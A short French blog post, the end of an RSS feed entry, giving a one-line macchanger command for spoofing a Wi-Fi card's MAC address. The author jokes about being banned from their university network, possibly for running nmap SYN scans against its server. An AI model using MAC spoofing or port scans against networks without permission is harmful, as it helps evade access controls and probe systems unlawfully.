<p>Donc petite astuce simplisime au possible:</p>
<blockquote><p>sudo macchanger -A wlan0</p></blockquote>
<p>Ayé, votre adresse MAC n&#8217;est plus la même sur votre carte wifi (à adapter selon votre carte: eth0, etc..).</p>
<p>Apparemment à Dauphine ils doivent associer login et adresse MAC, car sitôt fait je me suis fait bannir du serveur&#8230; (ou alors serait-ce à cause des grand coups de nmap -sS que j&#8217;envoie sur le serveur??). Bref, plus de connexion à la fac pour dieu sait combien de temps.</p>
<p>A+ les Tux</p>
]]></content:encoded>
			<wfw:commentRss>http://www.friendly-froggy.net/2009/11/12/changer-son-adresse-mac/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
	</channel>
</rss>

